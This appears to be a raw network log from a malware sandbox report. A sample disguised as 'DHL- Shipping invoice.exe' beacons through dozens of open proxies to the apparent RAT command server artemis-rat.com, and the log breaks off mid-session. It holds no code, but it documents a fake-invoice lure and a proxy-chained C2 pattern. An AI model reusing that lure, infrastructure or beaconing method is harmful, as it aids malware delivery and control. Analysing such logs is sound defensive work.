                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.590142965 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.953464985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.750183105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.104002953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.453262091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:10.750185966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1412192.168.2.452710132.148.167.231469836484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.215950012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.265872002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:11.359530926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:17.359435081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:29.374797106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:41.562335014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:53.562289953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:38:17.562263966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1413192.168.2.453640115.96.208.12480806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.217916965 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Mar 12, 2024 08:37:05.557014942 CET72INHTTP/1.1 200 Connection Established
                            Proxy-Agent: Fortinet-Proxy/1.0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1414192.168.2.454205177.12.118.160806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.220295906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1415192.168.2.4526675.189.146.57806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.224958897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.343539953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:11.453309059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:17.453309059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:29.456947088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:41.452892065 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:53.452903986 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:38:17.452933073 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:39:05.531040907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1416192.168.2.454153121.182.138.71806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.228727102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1417192.168.2.453572171.244.140.160150846484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.230257988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.265969992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:11.359530926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:17.359435081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:29.374798059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:53.452904940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:38:41.562354088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1418192.168.2.454317185.162.228.128806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.232767105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.320288897 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:05 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1419192.168.2.454326104.23.128.174806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.239685059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.327389002 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:05 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1420192.168.2.454279166.62.121.102458866484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.284050941 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1421192.168.2.45415858.234.116.19781976484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.287153959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1422192.168.2.454352172.67.69.9806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.301141977 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.388662100 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:05 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1423192.168.2.454269147.75.34.86100106484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.301770926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.464684010 CET65INHTTP/1.1 200 Connection Established
                            Proxy-Agent: Zscaler/6.3


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1424192.168.2.45417265.1.244.232806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.302288055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.581552982 CET116INHTTP/1.1 200 OK
                            Date: Tue, 12 Mar 2024 07:37:05 GMT
                            Server: nginx
                            Content-Type: text/plain
                            Content-Length: 0
                            Mar 12, 2024 08:37:05.581892014 CET369OUTData Raw: 16 03 03 01 6c 01 00 01 68 03 03 65 f0 06 20 20 6a 9f 8f c8 b9 81 08 a4 7a 5c 30 99 28 81 89 db e8 aa 34 0f 6b 02 2e 14 c9 ff a3 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                            Data Ascii: lhe jz\0(4k.*,+0/$#('=<5/artemis-rat.com#wUC]a^LxN6(__^WK/$MsELUDEoRN8MJx
                            Mar 12, 2024 08:37:05.862775087 CET1079INData Raw: 16 03 03 00 3d 02 00 00 39 03 03 69 72 e2 ba 77 42 6a 35 a4 63 00 71 94 ab dd 0e c0 2e cb a3 42 e1 91 16 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30
                            Data Ascii: =9irwBj5cq.BDOWNGRD0000*H010Uartemis-rat.com0240312065505Z260312065505Z010Uartemis-rat.com0"0*H0iyXHy
                            Mar 12, 2024 08:37:05.941139936 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 8b 5e c9 5d a7 f1 e3 43 34 c6 fd 20 38 4d ed db 86 cc c4 3a ce 8c f2 cd cc a1 c6 00 5c c6 0c 17 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 f3 7e 21 23 72 a3 ea 1e d7 dd a9 9a 83 dc 7d ac 68 0a 7a ca e3
                            Data Ascii: %! ^]C4 8M:\(~!#r}hzOWh
                            Mar 12, 2024 08:37:06.219422102 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 c5 42 e6 e0 0d be 2b 2d 90 6c 5f e0 fe 86 ad 95 e8 32 da ef 9a 6c f2 88 42 2f c3 45 a9 66 26 98 4e f2 69 1a c0 1e d0 04
                            Data Ascii: (B+-l_2lB/Ef&Ni


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1425192.168.2.454256185.250.27.5431286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.302531958 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.953077078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:25.429755926 CET39INHTTP/1.0 200 Connection established


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1426192.168.2.454132203.160.61.10441456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.302913904 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1427192.168.2.4542683.127.62.252806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.303170919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.476691961 CET116INHTTP/1.1 200 OK
                            Date: Tue, 12 Mar 2024 07:37:05 GMT
                            Server: nginx
                            Content-Type: text/plain
                            Content-Length: 0
                            Mar 12, 2024 08:37:05.497469902 CET369OUTData Raw: 16 03 03 01 6c 01 00 01 68 03 03 65 f0 06 20 9f d5 6f 54 0d d5 de 13 a6 d7 82 2f b2 ca 11 03 0a 06 71 47 18 d2 42 01 bd 3c 0b 0e 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                            Data Ascii: lhe oT/qGB<*,+0/$#('=<5/artemis-rat.com#78ls-OuupD1'JN\X[k5XKLT3x;YN?
                            Mar 12, 2024 08:37:05.666929960 CET1079INData Raw: 16 03 03 00 3d 02 00 00 39 03 03 e2 de c2 44 d3 2b a8 90 b5 b7 9d f5 fd b1 8e 32 61 e3 d2 bc 53 bf 24 e3 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30
                            Data Ascii: =9D+2aS$DOWNGRD0000*H010Uartemis-rat.com0240312071934Z260312071934Z010Uartemis-rat.com0"0*H0)TY$`k
                            Mar 12, 2024 08:37:05.935697079 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 ee 84 00 57 84 db 41 f5 b7 6e 8b 83 6a ab f0 a6 88 65 e2 e0 d2 ea 84 a0 65 47 eb 6b b0 5d d0 17 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 70 06 33 e8 59 43 21 d2 f1 6c 13 e0 6c ab 47 1d 81 97 6a 7e c4
                            Data Ascii: %! WAnjeeGk](p3YC!llGj~u*o
                            Mar 12, 2024 08:37:06.103902102 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 68 68 2b 55 e3 63 d5 04 c8 33 86 d4 26 f8 0d 9a a1 ac 32 64 da 54 49 6a 6a 93 18 f9 3e 4e 30 53 6f 4e 03 d8 6d fb 7e dd
                            Data Ascii: (hh+Uc3&2dTIjj>N0SoNm~


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1428192.168.2.454362185.162.229.112806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.304136038 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.391701937 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:05 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1429192.168.2.454291107.180.88.173598206484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.304423094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.765742064 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.250526905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.265933037 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.062832117 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
